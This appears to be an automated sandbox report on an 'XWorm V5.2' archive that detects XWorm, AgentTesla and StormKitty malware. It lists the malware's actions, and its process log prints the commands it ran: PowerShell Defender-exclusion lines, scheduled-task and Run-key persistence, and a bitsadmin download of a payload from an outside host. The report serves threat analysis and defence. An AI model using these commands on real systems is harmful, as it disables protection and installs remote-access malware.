Analysis Overview
SHA256
3e9a0998c2f1af74e4055ac67035f3db0212901ed273278dfcea9015f4deaa5b
Threat Level: Known bad
The file XWorm V5.2.zip was found to be: Known bad.
Malicious Activity Summary
Agenttesla family
AgentTesla payload
Stormkitty family
Contains code to disable Windows Defender
Xworm family
Detect Xworm Payload
StormKitty payload
Xworm
Command and Scripting Interpreter: PowerShell
Download via BitsAdmin
Drops startup file
Checks computer location settings
Executes dropped EXE
Obfuscated with Agile.Net obfuscator
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Suspicious use of SendNotifyMessage
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
Modifies registry class
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Gathers network information
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-02 23:24
Signatures
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Agenttesla family
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Stormkitty family
Xworm family
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-02 23:23
Reported
2024-08-02 23:35
Platform
win7-20240708-en
Max time kernel
359s
Max time network
363s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.zip"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-02 23:23
Reported
2024-08-02 23:40
Platform
win10v2004-20240802-en
Max time kernel
834s
Max time network
673s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
| N/A | N/A | C:\ProgramData\XClient.exe | N/A |
| N/A | N/A | C:\Users\Public\q11111 | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\ProgramData\\XClient.exe" | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings | C:\Users\Admin\AppData\Roaming\Output.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\XClient.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\ProgramData\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Outfuytftjgfuyjput.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Outfuytftjgfuyjput.exe"
C:\Users\Admin\AppData\Roaming\XClient.exe
"C:\Users\Admin\AppData\Roaming\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Output.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\Output.exe"
C:\Users\Admin\AppData\Roaming\Output.exe
"C:\Users\Admin\AppData\Roaming\Output.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\bitsadmin.exe
"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://www.example.com/XClient.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcde01cc40,0x7ffcde01cc4c,0x7ffcde01cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=1820 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2172 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=2544 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3180 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3352,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=3372 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4520 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4796,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4944 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4944 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=3812,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=5008 /prefetch:1
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
C:\Windows\system32\ipconfig.exe
ipconfig
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4076,i,3870977664814529505,9315824726801981298,262144 --variations-seed-version=20240802-050153.822000 --mojo-platform-channel-handle=4040 /prefetch:8
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\Icons\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe"
C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe
"C:\Users\Admin\Desktop\XWorm V5.2\XWorm V5.2\XClient.exe"
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\ProgramData\XClient.exe
C:\ProgramData\XClient.exe
C:\Users\Public\q11111
C:\Users\Public\q11111
C:\ProgramData\XClient.exe
